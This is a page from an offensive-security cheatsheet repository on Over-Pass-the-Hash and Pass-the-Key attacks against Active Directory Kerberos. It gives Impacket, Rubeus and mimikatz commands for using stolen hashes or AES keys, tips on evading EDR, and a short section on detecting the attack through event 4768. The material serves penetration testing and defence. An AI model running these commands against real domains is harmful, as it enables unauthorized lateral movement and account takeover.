daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

over-pass-the-hash-pass-the-key.md (7137B)


      1 ---
      2 title: "Over Pass the Hash/Pass the Key"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Over Pass the Hash/Pass the Key
     14 
     15 ## Overpass The Hash/Pass The Key (PTK)
     16 
     17 The **Overpass The Hash/Pass The Key (PTK)** attack is designed for environments where the traditional NTLM protocol is restricted, and Kerberos authentication takes precedence. This attack leverages the NTLM hash or AES keys of a user to solicit Kerberos tickets, enabling unauthorized access to resources within a network.
     18 
     19 Strictly speaking:
     20 
     21 - **Over-Pass-the-Hash** usually means turning the **NT hash** into a Kerberos TGT via the **RC4-HMAC** Kerberos key.
     22 - **Pass-the-Key** is the more generic version where you already have a Kerberos key such as **AES128/AES256** and request a TGT directly with it.
     23 
     24 This difference matters in hardened environments: if **RC4 is disabled** or no longer assumed by the KDC, the **NT hash alone is not enough** and you need an **AES key** (or the cleartext password to derive it).
     25 
     26 To execute this attack, the initial step involves acquiring the NTLM hash or password of the targeted user's account. Upon securing this information, a Ticket Granting Ticket (TGT) for the account can be obtained, allowing the attacker to access services or machines to which the user has permissions.
     27 
     28 The process can be initiated with the following commands:<sup>[[1]](#references)</sup>
     29 
     30 ```bash
     31 python getTGT.py -dc-ip 10.10.10.10 jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
     32 export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
     33 python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
     34 ```
     35 
     36 For scenarios necessitating AES256, the `-aesKey [AES key]` option can be utilized:<sup>[[1]](#references)</sup>
     37 
     38 ```bash
     39 python getTGT.py -dc-ip 10.10.10.10 jurassic.park/velociraptor -aesKey <AES256_HEX>
     40 export KRB5CCNAME=velociraptor.ccache
     41 python wmiexec.py -k -no-pass jurassic.park/velociraptor@labwws02.jurassic.park
     42 ```
     43 
     44 `getTGT.py` also supports requesting a **service ticket directly through an AS-REQ** with `-service <SPN>`, which can be useful when you want a ticket for a specific SPN without an extra TGS-REQ:
     45 
     46 ```bash
     47 python getTGT.py -dc-ip 10.10.10.10 -aesKey <AES256_HEX> -service cifs/labwws02.jurassic.park jurassic.park/velociraptor
     48 ```
     49 
     50 Moreover, the acquired ticket might be employed with various tools, including `smbexec.py` or `wmiexec.py`, broadening the scope of the attack.
     51 
     52 Encountered issues such as _PyAsn1Error_ or _KDC cannot find the name_ are typically resolved by updating the Impacket library or using the hostname instead of the IP address, ensuring compatibility with the Kerberos KDC.
     53 
     54 An alternative command sequence using Rubeus.exe demonstrates another facet of this technique:<sup>[[1]](#references)</sup>
     55 
     56 ```bash
     57 .\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
     58 .\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
     59 ```
     60 
     61 This method mirrors the **Pass the Key** approach, with a focus on commandeering and utilizing the ticket directly for authentication purposes. In practice:
     62 
     63 - `Rubeus asktgt` sends the **raw Kerberos AS-REQ/AS-REP** itself and does **not** need admin rights unless you want to target another logon session with `/luid` or create a separate one with `/createnetonly`.<sup>[[2]](#references)</sup>
     64 - `mimikatz sekurlsa::pth` patches credential material into a logon session and therefore **touches LSASS**, which usually requires local admin or `SYSTEM` and is noisier from an EDR perspective.
     65 
     66 Examples with Mimikatz:
     67 
     68 ```bash
     69 sekurlsa::pth /user:velociraptor /domain:jurassic.park /ntlm:2a3de7fe356ee524cc9f3d579f2e0aa7 /run:cmd.exe
     70 sekurlsa::pth /user:velociraptor /domain:jurassic.park /aes256:<AES256_HEX> /run:cmd.exe
     71 ```
     72 
     73 To conform to operational security and use AES256, the following command can be applied:
     74 
     75 ```bash
     76 .\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec
     77 ```
     78 
     79 `/opsec` is relevant because Rubeus-generated traffic differs slightly from native Windows Kerberos. Also note that `/opsec` is intended for **AES256** traffic; using it with RC4 usually requires `/force`, which defeats much of the point because **RC4 in modern domains is itself a strong signal**.
     80 
     81 ## Detection notes
     82 
     83 Every TGT request generates **event `4768`** on the DC. In current Windows builds this event contains more useful fields than older writeups mention:
     84 
     85 - `TicketEncryptionType` tells you which enctype was used for the issued TGT. Typical values are `0x17` for **RC4-HMAC**, `0x11` for **AES128**, and `0x12` for **AES256**.<sup>[[3]](#references)</sup>
     86 - Updated events also expose `SessionKeyEncryptionType`, `PreAuthEncryptionType`, and the client's advertised enctypes, which helps distinguish **real RC4 dependence** from confusing legacy defaults.
     87 - Seeing `0x17` in a modern environment is a good clue that the account, host, or KDC fallback path still permits RC4 and is therefore more friendly to NT-hash-based Over-Pass-the-Hash.
     88 
     89 Microsoft has been progressively reducing RC4-by-default behavior since the November 2022 Kerberos hardening updates, and the current published guidance is to **remove RC4 as the default assumed enctype for AD DCs by the end of Q2 2026**. From an offensive perspective, that means **Pass-the-Key with AES** is increasingly the reliable path, while classic **NT-hash-only OpTH** will keep failing more often in hardened estates.<sup>[[3]](#references)</sup>
     90 
     91 For more details on Kerberos encryption types and related ticketing behaviour, check:
     92 
     93 [Kerberos Authentication](/hacktricks/windows-hardening/active-directory-methodology/kerberos-authentication)
     94 
     95 ## Stealthier version
     96 
     97 > [!WARNING]
     98 > Each logon session can only have one active TGT at a time so be careful.
     99 
    100 1. Create a new logon session with **`make_token`** from Cobalt Strike.
    101 2. Then, use Rubeus to generate a TGT for the new logon session without affecting the existing one.
    102 
    103 You can achieve a similar isolation from Rubeus itself with a sacrificial **logon type 9** session:
    104 
    105 ```bash
    106 .\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES256_HEX> /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
    107 ```
    108 
    109 This avoids overwriting the current session TGT and is usually safer than importing the ticket into your existing logon session.
    110 
    111 ## References
    112 
    113 - [1] [Tarlogic - Kerberos (II): ¿Cómo atacar Kerberos?](https://www.tarlogic.com/es/blog/como-atacar-kerberos/)
    114 - [2] [GhostPack - Rubeus (GitHub repository)](https://github.com/GhostPack/Rubeus)
    115 - [3] [Microsoft Learn - Detect and Remediate RC4 Usage in Kerberos](https://learn.microsoft.com/en-us/windows-server/security/kerberos/detect-remediate-rc4-kerberos)